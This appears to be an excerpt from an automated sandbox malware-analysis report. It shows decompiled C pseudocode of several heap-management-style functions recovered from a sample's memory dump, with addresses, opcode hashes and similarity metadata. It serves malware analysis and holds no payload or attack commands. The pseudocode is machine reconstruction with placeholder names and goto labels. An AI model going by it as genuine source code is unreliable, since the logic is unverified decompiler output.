                            				signed int _v32;
                            				intOrPtr _v36;
                            				signed short _v40;
                            				void* __ebx;
                            				void* __edi;
                            				void* __ebp;
                            				signed int* _t75;
                            				signed short _t77;
                            				intOrPtr _t78;
                            				signed int _t92;
                            				signed int _t98;
                            				signed int _t99;
                            				signed short _t105;
                            				unsigned int _t108;
                            				void* _t112;
                            				unsigned int _t119;
                            				signed int _t124;
                            				intOrPtr _t137;
                            				signed char _t139;
                            				signed int _t140;
                            				unsigned int _t141;
                            				signed char _t142;
                            				intOrPtr _t152;
                            				signed int _t153;
                            				signed int _t158;
                            				signed int _t159;
                            				intOrPtr _t172;
                            				signed int _t176;
                            				signed int _t178;
                            				signed short _t182;
                            				intOrPtr _t183;
                            
                            				_t119 = __edx;
                            				_v20 = __ecx;
                            				_t152 = _a4;
                            				_t172 = 0;
                            				_t182 = __edx >> 0x0000000c ^  *(__edx + 0x18) ^  *0x1806114;
                            				_v16 = __edx;
                            				_v36 = 0;
                            				_v5 = 0xff;
                            				_v40 = _t182;
                            				_v24 = _t182 >> 0x10;
                            				if(_t152 == 0) {
                            					L14:
                            					_t124 =  *(_t119 + 0x12) & 0x0000ffff;
                            					_v24 = _t124;
                            					_t183 = _v36;
                            					_t53 = _t119 + 0x10; // 0x10
                            					_t75 = _t53;
                            					_v28 = _t75;
                            					_t77 =  *_t75 & 0x0000ffff;
                            					_v12 = _t77;
                            					L15:
                            					while(1) {
                            						if(_t183 != 0) {
                            							L20:
                            							_t153 = _t77 + 0x00000001 & 0x0000ffff;
                            							asm("lock cmpxchg [ebx], cx");
                            							_t119 = _v16;
                            							_t77 = _t77 & 0x0000ffff;
                            							_v12 = _t77;
                            							if(_t153 == (_t77 & 0x0000ffff) + 1) {
                            								if(_t77 == 0) {
                            									_t78 = _t172;
                            									L27:
                            									_t119 = L017DD016(_t119, _t183, _t119, _t78);
                            									L0172FFB0(_t119, _t172, _t183 + 8);
                            									_t183 = _t172;
                            									if(_t119 != 0) {
                            										E017DC52D(_v20,  *((intOrPtr*)(_v20 + 0x78 + ( *(((_v40 & 0x0000ffff) + 7 >> 3) + 0x16faff8) & 0x000000ff) * 4)), _t119, _a8);
                            									}
                            									L29:
                            									_t172 = 1;
                            									if(_t183 != 0) {
                            										_t72 = _t183 + 8; // 0x8
                            										L0172FFB0(_t119, 1, _t72);
                            									}
                            									L31:
                            									return _t172;
                            								}
                            								if((_t77 & 0x0000ffff) != _v24 - 1) {
                            									goto L29;
                            								}
                            								_t78 = 2;
                            								goto L27;
                            							}
                            							_t124 = _v24;
                            							continue;
                            						}
                            						if(_t77 == 0 || (_t77 & 0x0000ffff) == _t124 - 1) {
                            							_t183 = E017DE018(_t119,  &_v5);
                            							if(_t183 == 0) {
                            								_t172 = 1;
                            								goto L31;
                            							}
                            							goto L19;
                            						} else {
                            							L19:
                            							_t77 = _v12;
                            							goto L20;
                            						}
                            					}
                            				}
                            				_t92 = _t182 & 0x0000ffff;
                            				_v28 = _t92;
                            				_t137 =  *((intOrPtr*)(__ecx + 0x78 + ( *((_t92 + 7 >> 3) + 0x16faff8) & 0x000000ff) * 4));
                            				_t98 =  *((intOrPtr*)(_t137 + 0x24));
                            				_t158 = _t152 - (_v24 & 0x0000ffff) - __edx;
                            				_v24 = _t98;
                            				_t99 = _t158;
                            				_v32 = _t158;
                            				_t139 =  *(_t137 + 0x28) & 0x000000ff;
                            				if(_t98 == 0) {
                            					_v12 = _t99 >> _t139;
                            					_t159 = _t158 & (1 << _t139) - 0x00000001;
                            					_t105 = _v12;
                            				} else {
                            					_t105 = E0175D340(_t99 * _v24, _t139, _t99 * _v24 >> 0x20);
                            					_v12 = _t105;
                            					_t159 = _v32 - _v28 * _t105;
                            				}
                            				if(_t159 == 0) {
                            					_t140 =  *(_t119 + 0x14) & 0x0000ffff;
                            					if(_t140 >= _t105) {
                            						_t140 = _t105 & 0x0000ffff;
                            					}
                            					 *(_t119 + 0x14) = _t140;
                            					_t141 = _t105 + _t105;
                            					_t142 = _t141 & 0x0000001f;
                            					_t176 = 3;
                            					_t178 =  !(_t176 << _t142);
                            					_t108 =  *(_t119 + (_t141 >> 5) * 4 + 0x20);
                            					do {
                            						asm("lock cmpxchg [ebx], edx");
                            					} while ((_t108 & _t178) != 0);
                            					if((_t108 >> _t142 & 0x00000001) != 0) {
                            						_t119 = _v16;
                            						_t172 = 0;
                            						if( *((char*)(_t119 + 0x1d)) > 1) {
                            							_t112 = E017DD864(_t119, _a4 - _t119, _t182 & 0x0000ffff, 0,  &_v32);
                            							_t184 = _t112;
                            							if(_t112 != 0xffffffff) {
                            								asm("lock xadd [ecx], edx");
                            								E017DD8DF(_v20, _t119, _t184, 2, _a8);
                            							}
                            						}
                            						goto L14;
                            					}
                            					_push(_t142);
                            					_push(_v12);
                            					E017DA80D( *_v20, 0x11, _a4, _v16);
                            					_t172 = 0;
                            				}
                            			}

                            Memory Dump Source
                            • Source File: 00000000.00000002.289263472.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_16f0000_7pECKdsaig.jbxd
                            Similarity
                            • Opcode ID: ca5fab3089da16b86bf5c1ea434f06f2a5ef275c6a308e2112d87af79f15f105
                            • Instruction ID: 0d032c7d54a9f0c1c7518752e0f02a47dc8d01bee0a67039661f094f81adbf0b
                            • Opcode Fuzzy Hash: ca5fab3089da16b86bf5c1ea434f06f2a5ef275c6a308e2112d87af79f15f105
                            • Instruction Fuzzy Hash: FB71F575A0012D9FCF25DFA9C8809BEFBF5EF88210B144169E945EB384D634D945CBA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 97%
                            			E017E28EC(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, signed int _a8) {
                            				char _v5;
                            				signed int _v12;
                            				signed int _v16;
                            				intOrPtr _v20;
                            				signed int _v24;
                            				intOrPtr _v28;
                            				signed int _v32;
                            				signed int _v36;
                            				intOrPtr _v40;
                            				void* __ebx;
                            				void* __edi;
                            				unsigned int _t62;
                            				unsigned int _t69;
                            				signed int _t71;
                            				signed int _t72;
                            				signed int _t77;
                            				intOrPtr _t85;
                            				unsigned int _t95;
                            				signed int _t98;
                            				signed int _t100;
                            				void* _t104;
                            				signed short _t108;
                            				signed int _t113;
                            				intOrPtr _t115;
                            				signed int _t116;
                            				intOrPtr _t117;
                            				signed int _t118;
                            				intOrPtr _t120;
                            				signed int _t121;
                            				signed int _t122;
                            				signed int _t124;
                            				signed int _t125;
                            				signed int _t126;
                            				signed int _t136;
                            				signed int _t137;
                            				signed int _t140;
                            				signed int _t145;
                            				intOrPtr _t147;
                            				signed int _t148;
                            				void* _t156;
                            
                            				_t115 = _a4;
                            				_v40 = __edx;
                            				_t147 = __ecx;
                            				_v20 = __ecx;
                            				if(__edx != _t115) {
                            					_t115 = _t115 + 2;
                            				}
                            				_t62 = _t115 + 7 >> 3;
                            				_t120 = _t62 + 1;
                            				_v28 = _t120;
                            				if(( *(_t147 + 0x38) & 0x00000001) != 0) {
                            					_t120 = _t62 + 2;
                            					_v28 = _t120;
                            				}
                            				_t64 = _t120 + _t120 & 0x0000ffff;
                            				_t136 = _a8 & 0x00000001;
                            				_v36 = _t120 + _t120 & 0x0000ffff;
                            				_v12 = _t136;
                            				if(_t136 == 0) {
                            					E01732280(_t64, _t147);
                            					_t136 = _v12;
                            				}
                            				_v5 = 0xff;
                            				while(1) {
                            					L7:
                            					_t121 = 0;
                            					_t145 =  *(_t147 + 8);
                            					_v24 =  *(_t147 + 0xc) & 1;
                            					_v16 = 0;
                            					if(_t145 == 0) {
                            						goto L17;
                            					}
                            					_t108 =  *0x1806110; // 0xad807883
                            					_v32 = _t108 & 0x0000ffff;
                            					do {
                            						_t156 = _v36 - ( *(_t145 - 4) & 0x0000ffff ^ _t145 - 0x00000004 & 0x0000ffff ^ _v32);
                            						if(_t156 < 0) {
                            							__eflags = _v24;
                            							_t121 = _t145;
                            							_t113 =  *_t145;
                            							_v16 = _t121;
                            							if(_v24 == 0) {
                            								L15:
                            								_t145 = _t113;
                            								goto L16;
                            							}
                            							__eflags = _t113;
                            							if(_t113 == 0) {
                            								goto L15;
                            							}
                            							_t145 = _t145 ^ _t113;
                            							goto L16;
                            						}
                            						if(_t156 <= 0) {
                            							L18:
                            							if(_t145 != 0) {
                            								_t122 =  *0x1806110; // 0xad807883
                            								_t36 = _t145 - 4; // -4
                            								_t116 = _t36;
                            								_t137 = _t116;
                            								_t69 =  *_t116 ^ _t122 ^ _t116;
                            								__eflags = _t69;
                            								if(_t69 >= 0) {
                            									_t71 = _t69 >> 0x00000010 & 0x00007fff;
                            									__eflags = _t71;
                            									if(_t71 == 0) {
                            										L36:
                            										_t72 = 0;
                            										__eflags = 0;
                            										L37:
                            										_t139 = _t137 - (_t72 << 0x0000000c) & 0xfffff000;
                            										__eflags = (0x0000abed ^  *((_t137 - (_t72 << 0x0000000c) & 0xfffff000) + 0x16)) -  *((intOrPtr*)((_t137 - (_t72 << 0x0000000c) & 0xfffff000) + 0x14));
                            										if(__eflags == 0) {
                            											_t77 = L017E25DD(_t147, _t139, __eflags, _t116, _v28, _a8,  &_v5);
                            											__eflags = _t77;
                            											if(_t77 == 0) {
                            												L39:
                            												_t148 = 0;
                            												__eflags = _v12;
                            												if(_v12 != 0) {
                            													L42:
                            													return _t148;
                            												}
                            												L0172FFB0(_t116, _t145, _v20);
                            												L41:
                            												_t148 = 0;
                            												__eflags = 0;
                            												goto L42;
                            											}
                            											_t46 = _t116 + 8; // 0x4
                            											_t148 = _t46;
                            											_t140 = (( *_t116 ^  *0x1806110 ^ _t116) >> 0x00000001 & 0x00007fff) * 8 - 8;
                            											_t85 = _v20;
                            											__eflags =  *(_t85 + 0x38) & 0x00000001;
                            											if(( *(_t85 + 0x38) & 0x00000001) != 0) {
                            												_t118 = _t116 + 0x10;
                            												__eflags = _t118 & 0x00000fff;
                            												if((_t118 & 0x00000fff) == 0) {
                            													_t148 = _t118;
                            													_t140 = _t140 - 8;
                            													__eflags = _t140;
                            												}
                            											}
                            											_t117 = _v40;
                            											_t124 =  *_t145;
                            											__eflags = _t117 - _t140;
                            											if(_t117 >= _t140) {
                            												_t125 = _t124 & 0xfffffeff;
                            												__eflags = _t125;
                            												 *_t145 = _t125;
                            											} else {
                            												_t126 = _t124 | 0x00000100;
                            												_push(_t126);
                            												 *_t145 = _t126;
                            												E017E2506(_t148, _t140, _t140 - _t117);
                            												_t85 = _v20;
                            											}
                            											__eflags = _v12;
                            											if(_v12 == 0) {
                            												L0172FFB0(_t117, _t145, _t85);
                            											}
                            											__eflags = _a8 & 0x00000002;
                            											if((_a8 & 0x00000002) != 0) {
                            												E0175FA60(_t148, 0, _t117);
                            											}
                            											goto L42;
                            										}
                            										_push(_t122);
                            										_push(0);
                            										E017DA80D( *((intOrPtr*)(_t147 + 0x20)), 0x12, _t139, _t116);
                            										goto L39;
                            									}
                            									_t137 = _t116 - (_t71 << 3);
                            									_t95 =  *_t137 ^ _t122 ^ _t137;
                            									__eflags = _t95;
                            									if(_t95 < 0) {
                            										L34:
                            										_t98 =  *(_t137 + 4) ^ _t122 ^ _t137;
                            										__eflags = _t98;
                            										L35:
                            										_t72 = _t98 & 0x000000ff;
                            										goto L37;
                            									}
                            									_t100 = _t95 >> 0x00000010 & 0x00007fff;
                            									__eflags = _t100;
                            									if(_t100 == 0) {
                            										goto L36;
                            									}
                            									_t137 = _t137 + _t100 * 0xfffffff8;
                            									__eflags = _t137;
                            									goto L34;
                            								}
                            								_t98 =  *_t145 ^ _t122 ^ _t116;
                            								goto L35;
                            							}
                            							if(_t136 == 0) {
                            								L0172FFB0(_t115, _t145, _t147);
                            							}
                            							_t104 = E017E3149(_t147, _t115, _a8);
                            							_t146 = _t104;
                            							if(_t104 == 0) {
                            								goto L41;
                            							} else {
                            								if(_v12 == 0) {
                            									E01732280(_t104, _t147);
                            								}
                            								_v5 = 0xff;
                            								E017E2876(_t147, _t146);
                            								_t136 = _v12;
                            								goto L7;
                            							}
                            						}
                            						_t113 =  *(_t145 + 4);
                            						if(_v24 == 0 || _t113 == 0) {
                            							_t121 = _v16;
                            							goto L15;
                            						} else {
                            							_t121 = _v16;
                            							_t145 = _t145 ^ _t113;
                            						}
                            						L16:
                            					} while (_t145 != 0);
                            					L17:
                            					_t145 = _t121;
                            					goto L18;
                            				}
                            			}











































                            Memory Dump Source
                            • Source File: 00000000.00000002.289263472.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_16f0000_7pECKdsaig.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 64edf789523a91b7bd51a7faf0028769b0a8341cb08aca656961a23e1d7ba517
                            • Instruction ID: c69c2fd80b79eb69681570e19c69413fbed8fd2254a2e63f5e833e379a93f6f1
                            • Opcode Fuzzy Hash: 64edf789523a91b7bd51a7faf0028769b0a8341cb08aca656961a23e1d7ba517
                            • Instruction Fuzzy Hash: C171D531A0050A9BDB25CF6DC888A7EFBFAEF4C350F148169D915E7286EB34DA41C790
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 39%
                            			E017AB8D0(void* __edx, intOrPtr _a4, intOrPtr _a8, signed char _a12, signed int** _a16) {
                            				char _v8;
                            				signed int _v12;
                            				signed int _t80;
                            				signed int _t83;
                            				intOrPtr _t89;
                            				signed int _t92;
                            				signed char _t106;
                            				signed int* _t107;
                            				intOrPtr _t108;
                            				intOrPtr _t109;
                            				signed int _t114;
                            				void* _t115;
                            				void* _t117;
                            				void* _t119;
                            				void* _t122;
                            				signed int _t123;
                            				signed int* _t124;
                            
                            				_t106 = _a12;
                            				if((_t106 & 0xfffffffc) != 0) {
                            					return 0xc000000d;
                            				}
                            				if((_t106 & 0x00000002) != 0) {
                            					_t106 = _t106 | 0x00000001;
                            				}
                            				_t109 =  *0x1807b9c; // 0x0
                            				_t124 = L01734620(_t109 + 0x140000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t109 + 0x140000, 0x424 + (_a8 - 1) * 0xc);
                            				if(_t124 != 0) {
                            					 *_t124 =  *_t124 & 0x00000000;
                            					_t124[1] = _t124[1] & 0x00000000;
                            					_t124[4] = _t124[4] & 0x00000000;
                            					if( *((intOrPtr*)( *[fs:0x18] + 0xf9c)) == 0) {
                            						L13:
                            						_push(_t124);
                            						if((_t106 & 0x00000002) != 0) {
                            							_push(0x200);
                            							_push(0x28);
                            							_push(0xffffffff);
                            							_t122 = E01759800();
                            							if(_t122 < 0) {
                            								L33:
                            								if((_t124[4] & 0x00000001) != 0) {
                            									_push(4);
                            									_t64 =  &(_t124[1]); // 0x4
                            									_t107 = _t64;
                            									_push(_t107);
                            									_push(5);
                            									_push(0xfffffffe);
                            									L017595B0();
                            									if( *_t107 != 0) {
                            										_push( *_t107);
                            										E017595D0();
                            									}
                            								}
                            								_push(_t124);
                            								_push(0);
                            								_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
                            								L37:
                            								L017377F0();
                            								return _t122;
                            							}
                            							_t124[4] = _t124[4] | 0x00000002;
                            							L18:
                            							_t108 = _a8;
                            							_t29 =  &(_t124[0x105]); // 0x414
                            							_t80 = _t29;
                            							_t30 =  &(_t124[5]); // 0x14
                            							_t124[3] = _t80;
                            							_t123 = 0;
                            							_t124[2] = _t30;
                            							 *_t80 = _t108;
                            							if(_t108 == 0) {
                            								L21:
                            								_t112 = 0x400;
                            								_push( &_v8);
                            								_v8 = 0x400;
                            								_push(_t124[2]);
                            								_push(0x400);
                            								_push(_t124[3]);
                            								_push(0);
                            								_push( *_t124);
                            								_t122 = E01759910();
                            								if(_t122 != 0xc0000023) {
                            									L26:
                            									if(_t122 != 0x106) {
                            										L40:
                            										if(_t122 < 0) {
                            											L29:
                            											_t83 = _t124[2];
                            											if(_t83 != 0) {
                            												_t59 =  &(_t124[5]); // 0x14
                            												if(_t83 != _t59) {
                            													L017377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t83);
                            												}
                            											}
                            											_push( *_t124);
                            											E017595D0();
                            											goto L33;
                            										}
                            										 *_a16 = _t124;
                            										return 0;
                            									}
                            									if(_t108 != 1) {
                            										_t122 = 0;
                            										goto L40;
                            									}
                            									_t122 = 0xc0000061;
                            									goto L29;
                            								} else {
                            									goto L22;
                            								}
                            								while(1) {
                            									L22:
                            									_t89 =  *0x1807b9c; // 0x0
                            									_t92 = L01734620(_t112,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t89 + 0x140000, _v8);
                            									_t124[2] = _t92;
                            									if(_t92 == 0) {
                            										break;
                            									}
                            									_t112 =  &_v8;
                            									_push( &_v8);
                            									_push(_t92);
                            									_push(_v8);
                            									_push(_t124[3]);
                            									_push(0);
                            									_push( *_t124);
                            									_t122 = E01759910();
                            									if(_t122 != 0xc0000023) {
                            										goto L26;
                            									}
                            									L017377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t124[2]);
                            								}
                            								_t122 = 0xc0000017;
                            								goto L26;
                            							}
                            							_t119 = 0;
                            							do {
                            								_t114 = _t124[3];
                            								_t119 = _t119 + 0xc;
                            								 *((intOrPtr*)(_t114 + _t119 - 8)) =  *((intOrPtr*)(_a4 + _t123 * 4));
                            								 *(_t114 + _t119 - 4) =  *(_t114 + _t119 - 4) & 0x00000000;
                            								_t123 = _t123 + 1;
                            								 *((intOrPtr*)(_t124[3] + _t119)) = 2;
                            							} while (_t123 < _t108);
                            							goto L21;
                            						}
                            						_push(0x28);
                            						_push(3);
                            						_t122 = L0171A7B0();
                            						if(_t122 < 0) {
                            							goto L33;
                            						}
                            						_t124[4] = _t124[4] | 0x00000001;
                            						goto L18;
                            					}
                            					if((_t106 & 0x00000001) == 0) {
                            						_t115 = 0x28;
                            						_t122 = L017AE7D3(_t115, _t124);
                            						if(_t122 < 0) {
                            							L9:
                            							_push(_t124);
                            							_push(0);
                            							_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
                            							goto L37;
                            						}
                            						L12:
                            						if( *_t124 != 0) {
                            							goto L18;
                            						}
                            						goto L13;
                            					}
                            					_t15 =  &(_t124[1]); // 0x4
                            					_t117 = 4;
                            					_t122 = L017AE7D3(_t117, _t15);
                            					if(_t122 >= 0) {
                            						_t124[4] = _t124[4] | 0x00000001;
                            						_v12 = _v12 & 0x00000000;
                            						_push(4);
                            						_push( &_v12);
                            						_push(5);
                            						_push(0xfffffffe);
                            						L017595B0();
                            						goto L12;
                            					}
                            					goto L9;
                            				} else {
                            					return 0xc0000017;
                            				}
                            			}




















                            0x00000000
                            0x00000000
                            0x017aba90
                            0x017aba90
                            0x017aba97
                            0x00000000
                            0x017aba97
                            0x017ab9f5
                            0x017ab9f7
                            0x017ab9f7
                            0x017ab9fa
                            0x017aba03
                            0x017aba07
                            0x017aba0c
                            0x017aba10
                            0x017aba17
                            0x00000000
                            0x017ab9f7
                            0x017ab9a6
                            0x017ab9a8
                            0x017ab9af
                            0x017ab9b3
                            0x00000000
                            0x00000000
                            0x017ab9b9
                            0x00000000
                            0x017ab9b9
                            0x017ab94d
                            0x017ab98f
                            0x017ab995
                            0x017ab999
                            0x017ab960
                            0x017ab967
                            0x017ab968
                            0x017ab96a
                            0x00000000
                            0x017ab96a
                            0x017ab99b
                            0x017ab99e
                            0x00000000
                            0x00000000
                            0x00000000
                            0x017ab99e
                            0x017ab951
                            0x017ab954
                            0x017ab95a
                            0x017ab95e
                            0x017ab972
                            0x017ab979
                            0x017ab97d
                            0x017ab97f
                            0x017ab980
                            0x017ab982
                            0x017ab984
                            0x00000000
                            0x017ab984
                            0x00000000
                            0x017ab926
                            0x00000000
                            0x017ab926

                            Memory Dump Source
                            • Source File: 00000000.00000002.289263472.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_16f0000_7pECKdsaig.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 1eff56ddbb7c56b97d14d46570c113ec39a21671b28c02ab40601d8f052ca20a
                            • Instruction ID: f782936bda0129b223f5df83ec0141432b78d080e8eb1b2344de17bf3fd851bb
                            • Opcode Fuzzy Hash: 1eff56ddbb7c56b97d14d46570c113ec39a21671b28c02ab40601d8f052ca20a
                            • Instruction Fuzzy Hash: CB710132200B06EFE732CF28C858F56FBE5EB80724F544628E655876A1DB75EA40DB50
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E017D1002(intOrPtr __ecx, void* __edx) {
                            				signed int _v8;
                            				intOrPtr _v12;
                            				intOrPtr _v16;
                            				signed int _v20;
                            				signed int _t75;
                            				intOrPtr* _t76;
                            				signed int _t77;
                            				signed short _t78;
                            				signed short _t80;
                            				signed int _t81;
                            				signed short _t82;
                            				signed short _t83;
                            				signed short _t85;
                            				signed int _t86;
                            				void* _t90;
                            				signed short _t91;
                            				signed int _t95;
                            				signed short _t97;
                            				signed short _t99;
                            				intOrPtr* _t101;
                            				signed short _t102;
                            				signed int _t103;
                            				signed short _t105;
                            				intOrPtr _t106;
                            				signed int* _t108;
                            				signed short _t109;
                            				signed short _t111;
                            				signed short _t112;
                            				signed int _t113;
                            				signed short _t117;
                            				signed int _t120;
                            				void* _t121;
                            				signed int _t122;
                            				signed int _t126;
                            				signed int* _t127;
                            				signed short _t128;
                            				intOrPtr _t129;
                            				intOrPtr _t130;
                            				signed int _t132;
                            				signed int _t133;
                            
                            				_t121 = __edx;
                            				_t130 = __ecx;
                            				_v16 = __ecx;
                            				_t108 = __ecx + 0xa4;
                            				_t75 =  *_t108;
                            				L4:
                            				L4:
                            				if(_t75 != _t108) {
                            					goto L1;
                            				} else {
                            					_t127 = _t130 + 0x9c;
                            					_t120 =  *_t127;
                            				}
                            				while(_t120 != _t127) {
                            					_t132 = _t120 & 0xffff0000;
                            					__eflags = _t132 - _t121;
                            					if(_t132 <= _t121) {
                            						_t75 =  *((intOrPtr*)(_t120 + 0x14)) + _t132;
                            						__eflags = _t75 - _t121;
                            						if(_t75 > _t121) {
                            							 *0x1805898 = 5;
                            						}
                            					}
                            					_t120 =  *_t120;
                            				}
                            				L68:
                            				return _t75;
                            				L1:
                            				_t3 = _t75 - 0x10; // -16
                            				_t126 = _t3;
                            				_v20 = _t126;
                            				__eflags =  *((intOrPtr*)(_t126 + 0x1c)) - _t121;
                            				if( *((intOrPtr*)(_t126 + 0x1c)) > _t121) {
                            					L3:
                            					_t75 =  *_t75;
                            					goto L4;
                            				}
                            				__eflags =  *((intOrPtr*)(_t126 + 0x28)) - _t121;
                            				if( *((intOrPtr*)(_t126 + 0x28)) > _t121) {
                            					_t8 = _t126 + 0x38; // 0x28
                            					_t101 = _t8;
                            					_t109 = 0;
                            					_v8 = _v8 & 0;
                            					_t76 =  *_t101;
                            					_v12 = _t101;
                            					__eflags = _t76 - _t101;
                            					if(_t76 == _t101) {
                            						L17:
                            						_t102 = 0;
                            						_v20 = 0;
                            						__eflags = _t109;
                            						if(_t109 == 0) {
                            							_t109 = _t126;
                            						}
                            						_t128 = 0;
                            						__eflags = _t109 - _t121;
                            						if(_t109 >= _t121) {
                            							L29:
                            							_t111 = _v8 + 0xfffffff8;
                            							__eflags = _t111 - _t121;
                            							if(_t111 <= _t121) {
                            								L33:
                            								 *0x18058b0 = _t128;
                            								 *0x18058b4 = _t102;
                            								__eflags = _t128;
                            								if(_t128 == 0) {
                            									L42:
                            									__eflags =  *(_t130 + 0x4c);
                            									if( *(_t130 + 0x4c) == 0) {
                            										_t77 =  *_t128 & 0x0000ffff;
                            										_t112 = 0;
                            										__eflags = 0;
                            									} else {
                            										_t85 =  *_t128;
                            										_t112 =  *(_t130 + 0x4c);
                            										__eflags = _t85 & _t112;
                            										if((_t85 & _t112) != 0) {
                            											_t85 = _t85 ^  *(_t130 + 0x50);
                            											__eflags = _t85;
                            										}
                            										_t77 = _t85 & 0x0000ffff;
                            									}
                            									_v8 = _t77;
                            									__eflags = _t102;
                            									if(_t102 != 0) {
                            										_t117 =  *(_t102 + 4) & 0x0000ffff ^  *(_t130 + 0x54) & 0x0000ffff;
                            										__eflags = _t117;
                            										 *0x18058b8 = _t117;
                            										_t112 =  *(_t130 + 0x4c);
                            									}
                            									__eflags = _t112;
                            									if(_t112 == 0) {
                            										_t78 =  *_t128 & 0x0000ffff;
                            									} else {
                            										_t83 =  *_t128;
                            										__eflags =  *(_t130 + 0x4c) & _t83;
                            										if(( *(_t130 + 0x4c) & _t83) != 0) {
                            											_t83 = _t83 ^  *(_t130 + 0x50);
                            											__eflags = _t83;
                            										}
                            										_t78 = _t83 & 0x0000ffff;
                            									}
                            									_t122 = _t78 & 0x0000ffff;
                            									 *0x18058bc = _t122;
                            									__eflags =  *(_t130 + 0x4c);
                            									_t113 = _v8 & 0x0000ffff;
                            									if( *(_t130 + 0x4c) == 0) {
                            										_t80 =  *(_t128 + _t113 * 8) & 0x0000ffff;
                            									} else {
                            										_t82 =  *(_t128 + _t113 * 8);
                            										__eflags =  *(_t130 + 0x4c) & _t82;
                            										if(( *(_t130 + 0x4c) & _t82) != 0) {
                            											_t82 = _t82 ^  *(_t130 + 0x50);
                            											__eflags = _t82;
                            										}
                            										_t122 =  *0x18058bc; // 0x0
                            										_t80 = _t82 & 0x0000ffff;
                            									}
                            									_t81 = _t80 & 0x0000ffff;
                            									__eflags =  *0x18058b8 - _t81; // 0x0
                            									if(__eflags == 0) {
                            										_t75 =  *(_t130 + 0x54) & 0x0000ffff;
                            										__eflags = _t122 - ( *(_t128 + 4 + _t113 * 8) & 0x0000ffff ^ _t75);
                            										if(_t122 == ( *(_t128 + 4 + _t113 * 8) & 0x0000ffff ^ _t75)) {
                            											goto L68;
                            										}
                            										 *0x1805898 = 7;
                            										return _t75;
                            									} else {
                            										 *0x1805898 = 6;
                            										return _t81;
                            									}
                            								}
                            								__eflags = _t102;
                            								if(_t102 == 0) {
                            									goto L42;
                            								}
                            								__eflags =  *(_t130 + 0x4c);
                            								if( *(_t130 + 0x4c) == 0) {
                            									_t86 =  *_t128 & 0x0000ffff;
                            								} else {
                            									_t91 =  *_t128;
                            									__eflags =  *(_t130 + 0x4c) & _t91;
                            									if(( *(_t130 + 0x4c) & _t91) != 0) {
                            										_t91 = _t91 ^  *(_t130 + 0x50);
                            										__eflags = _t91;
                            									}
                            									_t86 = _t91 & 0x0000ffff;
                            								}
                            								_v8 = _t86;
                            								_t90 = _t128 + (_v8 & 0x0000ffff) * 8;
                            								__eflags = _t90 - _t102 - (( *(_t102 + 4) & 0x0000ffff ^  *(_t130 + 0x54) & 0x0000ffff) << 3);
                            								if(_t90 == _t102 - (( *(_t102 + 4) & 0x0000ffff ^  *(_t130 + 0x54) & 0x0000ffff) << 3)) {
                            									goto L42;
                            								} else {
                            									 *0x1805898 = 4;
                            									return _t90;
                            								}
                            							}
                            							_v20 =  *(_t130 + 0x54) & 0x0000ffff;
                            							while(1) {
                            								_t102 = _t111;
                            								_t95 = ( *(_t111 + 4) ^ _v20) & 0x0000ffff;
                            								__eflags = _t95;
                            								if(_t95 == 0) {
                            									goto L33;
                            								}
                            								_t111 = _t111 + _t95 * 0xfffffff8;
                            								__eflags = _t111 - _t121;
                            								if(_t111 > _t121) {
                            									continue;
                            								}
                            								goto L33;
                            							}
                            							goto L33;
                            						} else {
                            							_t103 =  *(_t130 + 0x4c);
                            							while(1) {
                            								_t128 = _t109;
                            								__eflags = _t103;
                            								if(_t103 == 0) {
                            									_t97 =  *_t109 & 0x0000ffff;
                            								} else {
                            									_t99 =  *_t109;
                            									_t103 =  *(_t130 + 0x4c);
                            									__eflags = _t99 & _t103;
                            									if((_t99 & _t103) != 0) {
                            										_t99 = _t99 ^  *(_t130 + 0x50);
                            										__eflags = _t99;
                            									}
                            									_t97 = _t99 & 0x0000ffff;
                            								}
                            								__eflags = _t97;
                            								if(_t97 == 0) {
                            									break;
                            								}
                            								_t109 = _t109 + (_t97 & 0x0000ffff) * 8;
                            								__eflags = _t109 - _t121;
                            								if(_t109 < _t121) {
                            									continue;
                            								}
                            								break;
                            							}
                            							_t102 = _v20;
                            							goto L29;
                            						}
                            					}
                            					_t133 = _v8;
                            					do {
                            						_t105 =  *((intOrPtr*)(_t76 + 0xc)) +  *((intOrPtr*)(_t76 + 8));
                            						_t129 = _v12;
                            						__eflags = _t105 - _t121;
                            						if(_t105 < _t121) {
                            							__eflags = _t105 - _t109;
                            							if(_t105 > _t109) {
                            								_t109 = _t105;
                            							}
                            						}
                            						_t106 =  *((intOrPtr*)(_t76 + 8));
                            						__eflags = _t106 - _t121;
                            						if(_t106 > _t121) {
                            							__eflags = _t133;
                            							if(_t133 == 0) {
                            								L14:
                            								_t18 = _t76 - 8; // -8
                            								_t133 = _t18;
                            								goto L15;
                            							}
                            							__eflags = _t106 -  *((intOrPtr*)(_t133 + 0x10));
                            							if(_t106 >=  *((intOrPtr*)(_t133 + 0x10))) {
                            								goto L15;
                            							}
                            							goto L14;
                            						}
                            						L15:
                            						_t76 =  *_t76;
                            						__eflags = _t76 - _t129;
                            					} while (_t76 != _t129);
                            					_t126 = _v20;
                            					_v8 = _t133;
                            					_t130 = _v16;
                            					goto L17;
                            				}
                            				goto L3;
                            			}

                            Memory Dump Source
                            • Source File: 00000000.00000002.289263472.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_16f0000_7pECKdsaig.jbxd
